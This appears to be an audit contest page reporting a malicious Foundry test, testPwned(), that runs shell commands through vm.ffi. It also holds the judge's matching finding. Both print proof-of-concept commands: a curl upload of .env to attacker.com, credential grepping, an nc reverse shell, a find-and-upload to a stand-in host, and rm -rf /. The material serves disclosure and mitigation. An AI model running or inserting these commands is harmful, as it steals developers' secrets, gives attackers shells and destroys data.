Santa's List

AI First Flight #3

Beginner FriendlyFoundry

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

testPwned() uses Foundry FFI to execute arbitrary shell commands on any machine that runs the test suite, enabling code execution, data exfiltration, and system destruction

virgilbb

Root + Impact

The test file includes testPwned(), which uses Foundry's FFI cheatcode to execute an arbitrary shell command (touch youve-been-pwned) on the host machine. Any developer or CI runner who runs forge test unknowingly executes this command. The same mechanism can be extended to exfiltrate private keys, install malware, or destroy the filesystem.

Description

Foundry's FFI (vm.ffi) allows tests to execute arbitrary shell commands on the machine running the test suite. It is an opt-in feature intended for trusted test environments.
testPwned() exploits this to run touch youve-been-pwned — a benign demonstration — but the identical code structure supports any shell payload:

// test/mocks/CheatCodes.t.sol

function testPwned() public {

string[] memory cmds = new string[](2);

cmds[0] = "touch";

cmds[1] = string.concat("youve-been-pwned");

cheatCodes.ffi(cmds); // @> executes arbitrary shell command on host

}

A malicious variant could exfiltrate environment variables (private keys, API keys, RPC URLs) or open a reverse shell:

// Malicious example — exfiltrate .env file

cmds[0] = "bash"; cmds[1] = "-c";

cmds[2] = "curl -d @.env https://attacker.com/collect";

Risk

Likelihood:

Every developer who clones the repository and runs forge test executes this function. CI/CD pipelines running the test suite are also affected. FFI is enabled by default when ffi = true is set in foundry.toml.

Impact:

Any secret accessible to the process running forge test — wallet private keys, .env files, API keys, shell history — can be exfiltrated silently. A destructive payload (rm -rf /) could permanently destroy the host's filesystem. This constitutes remote code execution risk for every contributor to the project.

Proof of Concept

Running the existing test suite confirms the file is created on the host:

forge test --mt testPwned

# After test: file "youve-been-pwned" exists in the working directory

ls youve-been-pwned # confirms execution

The same vector with a credential-exfiltration payload:

function testStealApiKey() public {

string[] memory cmds = new string[](3);

cmds[0] = "bash";

cmds[1] = "-c";

cmds[2] = "env | grep -E 'PRIVATE_KEY|API_KEY|RPC_URL' > /tmp/stolen_creds";

cheatCodes.ffi(cmds);

}

Any environment variable present during forge test is written to disk and accessible to the attacker.

Recommended Mitigation

Remove testPwned() and any other FFI-based test functions that execute non-deterministic shell commands. If FFI is required for legitimate test infrastructure, restrict it to a separate test suite that is not run by default, document exactly what commands it executes, and disable it in CI:

- function testPwned() public {

- string[] memory cmds = new string[](2);

- cmds[0] = "touch";

- cmds[1] = string.concat("youve-been-pwned");

- cheatCodes.ffi(cmds);

- }

Audit all FFI usage in the test suite before sharing the repository with other developers or running it in CI.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-06] Malicious Test potentially allowing data extraction from the user running it

## Description The test suite includes a function named testPwned, which executes arbitrary commands on the user's machine. This presents a significant security risk, as such commands could potentially extract sensitive data, establish a reverse shell for remote control, search for passwords, or install malware. ## Vulnerability Details This is the malicious test, it looks inoffensive as it just create a file called `youve-been-pwned` but there is no underlying reason for this test to be here except a malicious behavior. ```javascript function testPwned() public { string[] memory cmds = new string[](2); cmds[0] = "touch"; cmds[1] = string.concat("youve-been-pwned"); cheatCodes.ffi(cmds); } ``` A more alarming scenario is demonstrated in the following proof of concept, where the user's API key could be compromised:. First export the api key in your shell ```bash export ARBITRUMSCAN_API_KEY='MY_SECRET_KEY' ``` Then execute the test to store the API key in a file: ```javascript function testWriteCommande() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "env | grep ARBITRUMSCAN_API_KEY > PwnedApiKey"; cheatCodes.ffi(cmds); } ``` Alternatively, transmit it to an external server: ```javascript cmds[2] = "curl 'https://<HACKER_IP>?arbitrum_rpc_url='$(env | grep ARBITRUM_RPC_URL | cut -d '=' -f2)"; ``` Other interesting POC that qualify this issue as a HIGH ### POC 1: Reverse Shell Using Netcat This POC demonstrates how a test could open a reverse shell, allowing an attacker to gain control over the user's machine. ```javascript function testReverseShell() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "nc -e /bin/bash <HACKER_IP> <PORT>"; cheatCodes.ffi(cmds); } ``` ### POC 2: Finding Files and Sending Results to a Server This POC shows how a test could find specific files (starting with "pass" ) and send the results to a remote server. ```javascript function testFindCommand() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "find / -name 'pass*' | curl -F 'data=@-' https://<HACKER_IP>/upload"; cheatCodes.ffi(cmds); } ``` ### POC 3: Destructive Command (rm -rf /) This POC demonstrates a highly destructive command that could potentially erase all data on the user's root filesystem. # Warning: This command is extremely harmful and should never be executed. ```javascript function testDestructiveCommand() public { string[] memory cmds = new string[](2); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "rm -rf /"; cheatCodes.ffi(cmds); } ``` # Important Disclaimer: The rm -rf / command will delete everything on the filesystem for which the user has write permissions. It is provided here strictly for educational purposes to demonstrate the severity of security vulnerabilities in scripts and should never be run on any system. ## Impact This issue is categorized as HIGH due to the direct risk it poses to funds and sensitive information. The test, as it stands, is harmful, as it is used in a security contexts but i assume that the general purpose of this functionality is to be harmfull. It could lead to data breaches (including private keys and passwords), unauthorized remote code execution, and the potential destruction of digital information (e.g., rm -rf /). ## Recommendations Always exercise caution before running third-party programs on your system. Ensure you understand the functionality of any command or script to prevent unintended consequences, especially those involving security vulnerabilities.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!